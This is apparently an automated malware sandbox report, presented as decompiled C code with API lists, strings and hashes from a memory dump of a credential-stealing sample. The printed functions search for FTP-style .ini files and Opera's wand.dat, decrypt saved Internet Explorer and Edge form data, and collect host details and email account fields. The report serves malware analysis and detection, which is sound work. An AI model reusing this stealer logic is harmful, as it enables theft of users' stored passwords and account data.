                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 1000A651
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseEnumOpen
                                                                                                                                        • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                                                                                                                        • API String ID: 1332880857-2111798378
                                                                                                                                        • Opcode ID: 7dd37e93d84252d1bb9617f3d39f138388b42e95bf8b46414ef41dd468575a96
                                                                                                                                        • Instruction ID: 2785ff9534aa53aa2815e2693f8d91cd548089f1898f8c4855caa4bf57c61797
                                                                                                                                        • Opcode Fuzzy Hash: 7dd37e93d84252d1bb9617f3d39f138388b42e95bf8b46414ef41dd468575a96
                                                                                                                                        • Instruction Fuzzy Hash: 5F71643590011DEAEF22AF60CC51BDDBAB6FF04240F14C5A5F69865065DF72ABA1EF80
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 16.53%

                                                                                                                                        Function 10004A84, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 107filestringCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                        			E10004A84(void* __ecx, intOrPtr _a4, char* _a8, intOrPtr _a12) {
				struct _WIN32_FIND_DATAA _v324;
				void* _v328;
				CHAR* _v332;
				char* _v336;
				char* _t34;
				CHAR* _t38;
				void* _t42;
				char* _t61;
				char* _t62;
				void* _t66;
				signed int* _t67;
				void* _t68;

				_t66 = __ecx;
				_v332 = 0;
				_t34 = _a8;
				if(_t34 == 0 ||  *_t34 == 0) {
					L22:
					return E10001871(_v332);
				} else {
					if(E10002582(_a8) != 0) {
						_t38 = E10001DB1(_a8, "*.*");
					} else {
						_t38 = E10001DB1(_a8, "\*.*");
					}
					_v332 = _t38;
					E1000189F( &_v324, 0x13e);
					_t42 = FindFirstFileA(_v332,  &_v324); // executed
					_v328 = _t42;
					if(_t42 + 1 != 0) {
						do {
							_t67 =  &_v324;
							if(( *_t67 & 0x00000010) == 0) {
								_v336 =  &(_t67[0xb]);
								if(StrStrIA(_v336, ".ini") != 0) {
									_t61 = E10001E05(E10001DB1(_a8, "\\"), _v336);
									_push(_t61);
									_push(_t61);
									if(_a12 == 0) {
										_t62 = 1;
									} else {
										_t62 = StrStrIA(_t61, "Sites\\");
									}
									_pop(_t68);
									if(_t62 != 0) {
										E10004A6D(_a4, _t68);
									}
									E10001871();
								}
							} else {
								if(lstrcmpiA(0x1000f8fd,  &(_t67[0xb])) != 0) {
									if(lstrcmpiA(0x1000f8ff,  &( &_v324->cFileName)) != 0) {
										E10004A84(_t66, _a4, E10001E05(E10001DB1(_a8, "\\"),  &( &_v324->cFileName)), _a12);
										E10001871(_t56);
									}
								}
							}
						} while (FindNextFileA(_v328,  &_v324) != 0);
						FindClose(_v328);
					}
					goto L22;
				}
			}















                                                                                                                                        0x10004a84
                                                                                                                                        0x10004a8d
                                                                                                                                        0x10004a9a
                                                                                                                                        0x10004a9c
                                                                                                                                        0x10004c01
                                                                                                                                        0x10004c0d
                                                                                                                                        0x10004aa8
                                                                                                                                        0x10004ab2
                                                                                                                                        0x10004acb
                                                                                                                                        0x10004ab4
                                                                                                                                        0x10004abc
                                                                                                                                        0x10004abc
                                                                                                                                        0x10004ad0
                                                                                                                                        0x10004ae2
                                                                                                                                        0x10004af4
                                                                                                                                        0x10004af9
                                                                                                                                        0x10004b00
                                                                                                                                        0x10004b06
                                                                                                                                        0x10004b06
                                                                                                                                        0x10004b12
                                                                                                                                        0x10004b7c
                                                                                                                                        0x10004b94
                                                                                                                                        0x10004baa
                                                                                                                                        0x10004baf
                                                                                                                                        0x10004bb0
                                                                                                                                        0x10004bb5
                                                                                                                                        0x10004bc4
                                                                                                                                        0x10004bb7
                                                                                                                                        0x10004bbd
                                                                                                                                        0x10004bbd
                                                                                                                                        0x10004bc9
                                                                                                                                        0x10004bcc
                                                                                                                                        0x10004bd2
                                                                                                                                        0x10004bd2
                                                                                                                                        0x10004bd7
                                                                                                                                        0x10004bd7
                                                                                                                                        0x10004b14
                                                                                                                                        0x10004b24
                                                                                                                                        0x10004b41
                                                                                                                                        0x10004b6d
                                                                                                                                        0x10004b72
                                                                                                                                        0x10004b72
                                                                                                                                        0x10004b41
                                                                                                                                        0x10004b24
                                                                                                                                        0x10004bee
                                                                                                                                        0x10004bfc
                                                                                                                                        0x10004bfc
                                                                                                                                        0x00000000
                                                                                                                                        0x10004b00

                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 10004AF4
                                                                                                                                        • lstrcmpiA.KERNEL32(1000F8FD,?,00000000,?), ref: 10004B1D
                                                                                                                                        • lstrcmpiA.KERNEL32(1000F8FF,?,1000F8FD,?,00000000,?), ref: 10004B3A
                                                                                                                                        • FindNextFileA.KERNEL32(?,?,?,.ini,00000000,?), ref: 10004BE9
                                                                                                                                        • FindClose.KERNEL32(?,?,?,?,.ini,00000000,?), ref: 10004BFC
                                                                                                                                          • Part of subcall function 10001DB1: lstrlenA.KERNEL32(?), ref: 10001DD2
                                                                                                                                          • Part of subcall function 10001DB1: lstrlenA.KERNEL32(00000000,?), ref: 10001DDC
                                                                                                                                          • Part of subcall function 10001DB1: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 10001DF0
                                                                                                                                          • Part of subcall function 10001DB1: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 10001DF9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
                                                                                                                                        • String ID: *.*$.ini$Sites\$\*.*
                                                                                                                                        • API String ID: 3040542784-999409347
                                                                                                                                        • Opcode ID: 1728dadecd7df16186756211c261ddacedd66fc7505cbcf7c618c9f54e905af5
                                                                                                                                        • Instruction ID: dfb24860b23a16f760b9f85428c702041dd6fa9fe267a47ac1474cd16b53a2d5
                                                                                                                                        • Opcode Fuzzy Hash: 1728dadecd7df16186756211c261ddacedd66fc7505cbcf7c618c9f54e905af5
                                                                                                                                        • Instruction Fuzzy Hash: 11315CB5900109AEFF51DF60CC42FED76A9EF043C0F0681A5FA08A5069EF75EE90AB55
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 16.53%

                                                                                                                                        Function 100044F3, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 139libraryloaderUNIQUE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                        			E100044F3(void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				struct _OSVERSIONINFOA _v164;
				char* _v168;
				char _v172;
				intOrPtr _v176;
				struct _SYSTEM_INFO _v212;
				struct HINSTANCE__* _v216;
				void* __ebx;
				int _t51;
				void* _t61;
				intOrPtr _t65;
				intOrPtr* _t75;
				void* _t82;
				struct _SYSTEM_INFO* _t85;
				char* _t87;

				_v8 = E100015A9(_a4, 0, 0);
				E10001522(_a4, 0xbeef0001);
				E1000189F( &_v164, 0x9c);
				_v164.dwOSVersionInfoSize = 0x9c;
				_t51 = GetVersionExA( &_v164);
				_t85 = 0;
				_t86 = 0;
				_t87 =  &(_v164.szCSDVersion);
				while(_t85 < 0x80) {
					__eflags =  *_t87;
					if( *_t87 == 0) {
						_t86 = 1;
					}
					_t86 = _t86;
					__eflags = _t86;
					if(_t86 != 0) {
						 *_t87 = 0;
					}
					_t87 = _t87 + 1;
					_t85 =  &(_t85->dwOemId.dwOemId);
					__eflags = _t85;
				}
				if(_t51 == 0) {
					E10001558(_a4, 0, 0);
				} else {
					E10001558(_a4,  &_v164, 0x9c);
				}
				E10001522(_a4, E10002E8D());
				_v168 = E10001888(0x400);
				E10001558(_a4, _v168, GetLocaleInfoA(0x400, 0x1002, _v168, 0x3ff));
				E10001558(_a4, _v168, GetLocaleInfoA(0x400, 0x1001, _v168, 0x3ff)); // executed
				_t61 = E10002EF5(); // executed
				E10001522(_a4, _t61); // executed
				E10004462(_t85, _t86); // executed
				_t65 = E100027D0(_t85, _t86, "HWID",  &_v172); // executed
				_v176 = _t65;
				if(_v176 == 0 || _v172 < 0x14) {
					E10001558(_a4, 0, 0);
				} else {
					_v172 = _v172 + 4;
					E10001522(_a4, _v172);
					_v172 = _v172 - 4;
					E10001522(_a4, 0xffffffff);
					E10001537(_a4, _v176, _v172);
				}
				E10001871(_v176);
				E10001871(_v168);
				_t82 = 0;
				_v216 = GetModuleHandleA("kernel32.dll");
				if(_v216 != 0) {
					_t75 = GetProcAddress(_v216, "GetNativeSystemInfo");
					if(_t75 != 0) {
						_t86 =  &_v212;
						 *_t75( &_v212); // executed
						_t82 = 1;
					}
				}
				_t83 = _t82;
				_t96 = _t82;
				if(_t82 == 0) {
					GetSystemInfo( &_v212);
				}
				E10001558(_a4,  &_v212, 0x24);
				return E100015EF(_t83, _t85, _t86, _t96, _a4, _v8);
			}


















                                                                                                                                        0x1000450a
                                                                                                                                        0x10004515
                                                                                                                                        0x10004526
                                                                                                                                        0x1000452b
                                                                                                                                        0x1000453c
                                                                                                                                        0x10004541
                                                                                                                                        0x10004543
                                                                                                                                        0x10004545
                                                                                                                                        0x10004560
                                                                                                                                        0x1000454d
                                                                                                                                        0x10004550
                                                                                                                                        0x10004552
                                                                                                                                        0x10004552
                                                                                                                                        0x10004557
                                                                                                                                        0x10004557
                                                                                                                                        0x10004559
                                                                                                                                        0x1000455b
                                                                                                                                        0x1000455b
                                                                                                                                        0x1000455e
                                                                                                                                        0x1000455f
                                                                                                                                        0x1000455f
                                                                                                                                        0x1000455f
                                                                                                                                        0x1000456a
                                                                                                                                        0x10004589
                                                                                                                                        0x1000456c
                                                                                                                                        0x1000457b
                                                                                                                                        0x1000457b
                                                                                                                                        0x10004597
                                                                                                                                        0x100045a6
                                                                                                                                        0x100045d0
                                                                                                                                        0x100045f9
                                                                                                                                        0x100045fe
                                                                                                                                        0x10004607
                                                                                                                                        0x1000460c
                                                                                                                                        0x1000461d
                                                                                                                                        0x10004622
                                                                                                                                        0x1000462f
                                                                                                                                        0x1000467d
                                                                                                                                        0x1000463a
                                                                                                                                        0x1000463a
                                                                                                                                        0x1000464a
                                                                                                                                        0x1000464f
                                                                                                                                        0x1000465b
                                                                                                                                        0x1000466f
                                                                                                                                        0x1000466f
                                                                                                                                        0x10004688
                                                                                                                                        0x10004693
                                                                                                                                        0x10004698
                                                                                                                                        0x100046a4
                                                                                                                                        0x100046b1
                                                                                                                                        0x100046c3
                                                                                                                                        0x100046c5
                                                                                                                                        0x100046c7
                                                                                                                                        0x100046ce
                                                                                                                                        0x100046d0
                                                                                                                                        0x100046d0
                                                                                                                                        0x100046c5
                                                                                                                                        0x100046d1
                                                                                                                                        0x100046d1
                                                                                                                                        0x100046d3
                                                                                                                                        0x100046dc
                                                                                                                                        0x100046dc
                                                                                                                                        0x100046ed
                                                                                                                                        0x10004700

                                                                                                                                        APIs
                                                                                                                                        • GetVersionExA.KERNEL32(0000009C), ref: 1000453C
                                                                                                                                        • GetLocaleInfoA.KERNEL32(00000400,00001002,?,000003FF,00000400,0000009C), ref: 100045C1
                                                                                                                                        • GetLocaleInfoA.KERNEL32(00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 100045EA
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 1000469F
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 100046BE
                                                                                                                                        • GetNativeSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 100046CE
                                                                                                                                        • GetSystemInfo.KERNEL32(?,kernel32.dll,?,00000000,00000400,00001001,?,000003FF,00000400,00001002,?,000003FF,00000400,0000009C), ref: 100046DC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Info$LocaleSystem$AddressHandleModuleNativeProcVersion
                                                                                                                                        • String ID: GetNativeSystemInfo$HWID$kernel32.dll
                                                                                                                                        • API String ID: 1787888500-92997708
                                                                                                                                        • Opcode ID: 8ba9081ead8b85a4827e57aa99a48f6b601ebf9daf1fef26602265cb32dbbccf
                                                                                                                                        • Instruction ID: f3551a4575c16a329ef8b2f75a4e122ab3635f74703a56ba9832548d60b1d311
                                                                                                                                        • Opcode Fuzzy Hash: 8ba9081ead8b85a4827e57aa99a48f6b601ebf9daf1fef26602265cb32dbbccf
                                                                                                                                        • Instruction Fuzzy Hash: 1A514F79A00618FEFF11DB60CC06FDD7A76EF42381F4180A4B649790A9DB715F949B12
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 10007E6C, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 124stringencryptionUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 55%
                                                                                                                                        			E10007E6C(void* __ecx, intOrPtr _a4, WCHAR* _a8, short* _a12) {
				char _v24;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				void* _v64;
				char _v68;
				void* _v72;
				char _v76;
				void* _v80;
				char _v84;
				signed int _t52;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				void* _t84;
				signed int _t85;
				void* _t88;
				void* _t89;

				_t84 = __ecx;
				_t52 = lstrlenW(_a8);
				if(_t52 != 0) {
					E1000362D(_t84, _a8, (_t52 << 1) + 2,  &_v24);
					_t85 = 0;
					_v48 = 0;
					while(_t85 < 0x14) {
						_v48 = _v48 + ( *(_t85 +  &_v24) & 0x000000ff);
						_t85 = _t85 + 1;
					}
					_t88 = 0;
					_v52 = 0;
					while(_t88 < 0x14) {
						_push( *(_t88 +  &_v24) & 0x000000ff);
						wsprintfA( &_v44, "%02X");
						_t89 = _t89 + 0xc;
						_v52 = E10001E05(_v52,  &_v44);
						_t88 = _t88 + 1;
					}
					_v48 = _v48 & 0x000000ff;
					_push(_v48);
					wsprintfA( &_v44, "%02X");
					_v52 = E10001E05(_v52,  &_v44);
					_t68 = E10001D2A( *0x1000f159, "Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", _v52,  &_v56); // executed
					_t69 = _t68;
					if(_t69 == 0) {
						_t69 = E10001D2A( *0x1000f159, "SOFTWARE\\Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppContainer\\Storage\\microsoft.microsoftedge_8wekyb3d8bbwe\\MicrosoftEdge\\IntelliForms\\FormData", _v52,  &_v56); // executed
					}
					_t70 = _t69;
					if(_t70 != 0) {
						_v60 = _t70;
						if(_v56 != 0) {
							_v84 = (lstrlenW(_a8) << 1) + 2;
							_push(_a8);
							_pop( *_t32);
							_push(_v56);
							_pop( *_t34);
							_push(_v60);
							_pop( *_t36);
							_v72 = 0;
							if( *0x1000f4f4 != 0) {
								_push( &_v76);
								_push(1);
								_push(0);
								_push(0);
								_push( &_v84);
								_push(0);
								_push( &_v68);
								if( *0x1000f4f4() != 0 && _v72 != 0) {
									if(_a12 != 0) {
										 *_a12 = 0x3f;
									}
									E10007B9C(0xbeef0003, _a8, _v72, _v76, _a4);
									LocalFree(_v72);
								}
							}
						}
						E10001871(_v60);
					}
					return E10001871(_v52);
				} else {
					return _t52;
				}
			}























                                                                                                                                        0x10007e6c
                                                                                                                                        0x10007e7b
                                                                                                                                        0x10007e7d
                                                                                                                                        0x10007e93
                                                                                                                                        0x10007e98
                                                                                                                                        0x10007e9a
                                                                                                                                        0x10007ea8
                                                                                                                                        0x10007ea4
                                                                                                                                        0x10007ea7
                                                                                                                                        0x10007ea7
                                                                                                                                        0x10007ead
                                                                                                                                        0x10007eaf
                                                                                                                                        0x10007edb
                                                                                                                                        0x10007eb9
                                                                                                                                        0x10007ec3
                                                                                                                                        0x10007ec8
                                                                                                                                        0x10007ed7
                                                                                                                                        0x10007eda
                                                                                                                                        0x10007eda
                                                                                                                                        0x10007ee0
                                                                                                                                        0x10007ee7
                                                                                                                                        0x10007ef3
                                                                                                                                        0x10007f07
                                                                                                                                        0x10007f1c
                                                                                                                                        0x10007f21
                                                                                                                                        0x10007f23
                                                                                                                                        0x10007f37
                                                                                                                                        0x10007f37
                                                                                                                                        0x10007f3c
                                                                                                                                        0x10007f3e
                                                                                                                                        0x10007f44
                                                                                                                                        0x10007f4b
                                                                                                                                        0x10007f5e
                                                                                                                                        0x10007f61
                                                                                                                                        0x10007f64
                                                                                                                                        0x10007f67
                                                                                                                                        0x10007f6a
                                                                                                                                        0x10007f6d
                                                                                                                                        0x10007f70
                                                                                                                                        0x10007f73
                                                                                                                                        0x10007f81
                                                                                                                                        0x10007f86
                                                                                                                                        0x10007f87
                                                                                                                                        0x10007f89
                                                                                                                                        0x10007f8b
                                                                                                                                        0x10007f90
                                                                                                                                        0x10007f91
                                                                                                                                        0x10007f96
                                                                                                                                        0x10007f9f
                                                                                                                                        0x10007fab
                                                                                                                                        0x10007fb0
                                                                                                                                        0x10007fb0
                                                                                                                                        0x10007fc6
                                                                                                                                        0x10007fce
                                                                                                                                        0x10007fce
                                                                                                                                        0x10007f9f
                                                                                                                                        0x10007f81
                                                                                                                                        0x10007fd6
                                                                                                                                        0x10007fd6
                                                                                                                                        0x10007fe5
                                                                                                                                        0x10007e81
                                                                                                                                        0x10007e81
                                                                                                                                        0x10007e81

                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 10007E76
                                                                                                                                        • wsprintfA.USER32 ref: 10007EF3
                                                                                                                                        • lstrlenW.KERNEL32(?,?), ref: 10007F54
                                                                                                                                        • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 10007F97
                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 10007FCE
                                                                                                                                        Strings
                                                                                                                                        • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 10007F11
                                                                                                                                        • %02X, xrefs: 10007EBA, 10007EEA
                                                                                                                                        • SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms\FormData, xrefs: 10007F2C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$CryptDataFreeLocalUnprotectwsprintf
                                                                                                                                        • String ID: %02X$SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms\FormData$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                                                                                                                        • API String ID: 1926481713-2209629369
                                                                                                                                        • Opcode ID: c847d7dbf156e13f3f4f6d95becba6d19491879096561c4f765ecfaba1d5b72a
                                                                                                                                        • Instruction ID: 945d570ffd64688de8ac77bcfa3b85f80c13ad0b5f366b6f0017ba4c6604a26d
                                                                                                                                        • Opcode Fuzzy Hash: c847d7dbf156e13f3f4f6d95becba6d19491879096561c4f765ecfaba1d5b72a
                                                                                                                                        • Instruction Fuzzy Hash: 54416772C10119EBEF12DFA0DC41AEEBBBAFF08380F004025FA14A51A9E7759A51DB61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 100068C0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 77filestringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 90%
                                                                                                                                        			E100068C0(void* __ebx, void* __ecx, intOrPtr _a4, char* _a8) {
				struct _WIN32_FIND_DATAA _v324;
				void* _v328;
				CHAR* _v332;
				char** _v336;
				char* _v340;
				char* _t30;
				void* _t36;
				int _t39;
				char* _t48;
				void* _t54;
				void* _t55;

				_t55 = __ecx;
				_t54 = __ebx;
				_v332 = 0;
				_t30 = _a8;
				if(_t30 == 0 ||  *_t30 == 0) {
					L14:
					return E10001871(_v332);
				} else {
					_v332 = E10001DB1(_a8, "\*.*");
					E1000189F( &_v324, 0x13e);
					_t36 = FindFirstFileA(_v332,  &_v324); // executed
					_v328 = _t36;
					if(_t36 + 1 == 0) {
						goto L14;
					} else {
						goto L4;
					}
					do {
						L4:
						if((_v324.dwFileAttributes & 0x00000010) != 0) {
							if(lstrcmpiA(0x1000f8fd,  &( &_v324->cFileName)) != 0) {
								if(lstrcmpiA(0x1000f8ff,  &( &_v324->cFileName)) != 0) {
									_v336 =  &( &_v324->cFileName);
									_t48 = E10001E05(E10001DB1(_a8, "\\"), _v336);
									_v340 = _t48;
									_push(_t48);
									if(StrStrIA(_v340, "opera") != 0) {
										E1000673C(_t54, _t55, _a4, _v340, "wand.dat");
									}
									E10001871();
								}
							}
						}
						_t39 = FindNextFileA(_v328,  &_v324); // executed
					} while (_t39 != 0);
					FindClose(_v328); // executed
					goto L14;
				}
			}














                                                                                                                                        0x100068c0
                                                                                                                                        0x100068c0
                                                                                                                                        0x100068c9
                                                                                                                                        0x100068d6
                                                                                                                                        0x100068d8
                                                                                                                                        0x100069ed
                                                                                                                                        0x100069f9
                                                                                                                                        0x100068e4
                                                                                                                                        0x100068f1
                                                                                                                                        0x10006903
                                                                                                                                        0x10006915
                                                                                                                                        0x1000691a
                                                                                                                                        0x10006921
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10006927
                                                                                                                                        0x10006927
                                                                                                                                        0x10006933
                                                                                                                                        0x1000694f
                                                                                                                                        0x10006969
                                                                                                                                        0x10006976
                                                                                                                                        0x10006990
                                                                                                                                        0x10006995
                                                                                                                                        0x1000699b
                                                                                                                                        0x100069ae
                                                                                                                                        0x100069be
                                                                                                                                        0x100069be
                                                                                                                                        0x100069c3
                                                                                                                                        0x100069c3
                                                                                                                                        0x10006969
                                                                                                                                        0x1000694f
                                                                                                                                        0x100069d5
                                                                                                                                        0x100069da
                                                                                                                                        0x100069e8
                                                                                                                                        0x00000000
                                                                                                                                        0x100069e8

                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 10006915
                                                                                                                                        • lstrcmpiA.KERNEL32(1000F8FD,?,00000000,?), ref: 10006948
                                                                                                                                        • lstrcmpiA.KERNEL32(1000F8FF,?,1000F8FD,?,00000000,?), ref: 10006962
                                                                                                                                        • StrStrIA.SHLWAPI(?,opera,00000000,1000F8FF,?,1000F8FD,?,00000000,?), ref: 100069A7
                                                                                                                                        • FindNextFileA.KERNEL32(?,?,00000000,?), ref: 100069D5
                                                                                                                                        • FindClose.KERNEL32(?,?,?,00000000,?), ref: 100069E8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$Filelstrcmpi$CloseFirstNext
                                                                                                                                        • String ID: \*.*$opera$wand.dat
                                                                                                                                        • API String ID: 3663067366-3278183560
                                                                                                                                        • Opcode ID: f74ca87c9a1164d96b6df22719122c89a6263937ec1a51ae05beae7e1c30ea6f
                                                                                                                                        • Instruction ID: 687ec9b7e5b116488062f103f307b43f01d51fa91902aef376313c28fcf12ca9
                                                                                                                                        • Opcode Fuzzy Hash: f74ca87c9a1164d96b6df22719122c89a6263937ec1a51ae05beae7e1c30ea6f
                                                                                                                                        • Instruction Fuzzy Hash: 34311E75900519AAFF62DF60CC42BED77BAEF083C0F148191F60CA9569EB31AE949F50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.06%

                                                                                                                                        Function 1000419E, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 117filestringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                        			E1000419E(void* __ecx, intOrPtr _a4, char* _a8, char* _a12, intOrPtr _a16, intOrPtr _a20) {
				struct _WIN32_FIND_DATAA _v324;
				void* _v328;
				CHAR* _v332;
				char* _v336;
				char* _t44;
				CHAR* _t48;
				void* _t52;
				int _t58;
				void* _t67;
				void* _t73;
				void* _t77;
				signed int* _t78;

				_t77 = __ecx;
				_v332 = 0;
				_t44 = _a8;
				if(_t44 == 0 ||  *_t44 == 0) {
					L25:
					return E10001871(_v332);
				} else {
					if(E10002582(_a8) != 0) {
						_t48 = E10001DB1(_a8, "*.*");
					} else {
						_t48 = E10001DB1(_a8, "\*.*");
					}
					_v332 = _t48;
					E1000189F( &_v324, 0x13e);
					_t52 = FindFirstFileA(_v332,  &_v324); // executed
					_v328 = _t52;
					if(_t52 + 1 != 0) {
						do {
							_t78 =  &_v324;
							if(( *_t78 & 0x00000010) == 0) {
								_v336 =  &(_t78[0xb]);
								if(_a12 != 0) {
									if(StrStrIA(_v336, _a12) == 0) {
										goto L23;
									}
									L19:
									_t73 = E10001E05(E10001DB1(_a8, "\\"), _v336);
									_push(_t73);
									if(_a20 == 0) {
										E10004064(_a4, _t73, _a16);
									} else {
										_a20(_a4, _t73, _a16);
									}
									E10001871();
									goto L23;
								}
								goto L19;
							}
							if(lstrcmpiA(0x1000f8fd,  &(_t78[0xb])) != 0) {
								if(lstrcmpiA(0x1000f8ff,  &( &_v324->cFileName)) != 0) {
									if(E10002582(_a8) != 0) {
										_t67 = E10001DB1(_a8, 0);
									} else {
										_t67 = E10001DB1(_a8, "\\");
									}
									E1000419E(_t77, _a4, E10001E05(_t67,  &( &_v324->cFileName)), _a12, _a16, _a20); // executed
									E10001871(_t68);
								}
							}
							L23:
							_t58 = FindNextFileA(_v328,  &_v324); // executed
						} while (_t58 != 0);
						FindClose(_v328); // executed
					}
					goto L25;
				}
			}















                                                                                                                                        0x1000419e
                                                                                                                                        0x100041a7
                                                                                                                                        0x100041b4
                                                                                                                                        0x100041b6
                                                                                                                                        0x1000433a
                                                                                                                                        0x10004346
                                                                                                                                        0x100041c2
                                                                                                                                        0x100041cc
                                                                                                                                        0x100041e5
                                                                                                                                        0x100041ce
                                                                                                                                        0x100041d6
                                                                                                                                        0x100041d6
                                                                                                                                        0x100041ea
                                                                                                                                        0x100041fc
                                                                                                                                        0x1000420e
                                                                                                                                        0x10004213
                                                                                                                                        0x1000421a
                                                                                                                                        0x10004220
                                                                                                                                        0x10004220
                                                                                                                                        0x1000422c
                                                                                                                                        0x100042b8
                                                                                                                                        0x100042c2
                                                                                                                                        0x100042d6
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x100042d8
                                                                                                                                        0x100042ec
                                                                                                                                        0x100042f1
                                                                                                                                        0x100042f6
                                                                                                                                        0x1000430b
                                                                                                                                        0x100042f8
                                                                                                                                        0x100042ff
                                                                                                                                        0x100042ff
                                                                                                                                        0x10004310
                                                                                                                                        0x00000000
                                                                                                                                        0x10004310
                                                                                                                                        0x00000000
                                                                                                                                        0x100042c4
                                                                                                                                        0x10004242
                                                                                                                                        0x1000425f
                                                                                                                                        0x10004270
                                                                                                                                        0x10004286
                                                                                                                                        0x10004272
                                                                                                                                        0x1000427a
                                                                                                                                        0x1000427a
                                                                                                                                        0x100042a9
                                                                                                                                        0x100042ae
                                                                                                                                        0x100042ae
                                                                                                                                        0x1000425f
                                                                                                                                        0x10004315
                                                                                                                                        0x10004322
                                                                                                                                        0x10004327
                                                                                                                                        0x10004335
                                                                                                                                        0x10004335
                                                                                                                                        0x00000000
                                                                                                                                        0x1000421a

                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?), ref: 1000420E
                                                                                                                                        • lstrcmpiA.KERNEL32(1000F8FD,?,00000000,?), ref: 1000423B
                                                                                                                                        • lstrcmpiA.KERNEL32(1000F8FF,?,1000F8FD,?,00000000,?), ref: 10004258
                                                                                                                                        • FindNextFileA.KERNEL32(?,?,?,00000000,00000000,?), ref: 10004322
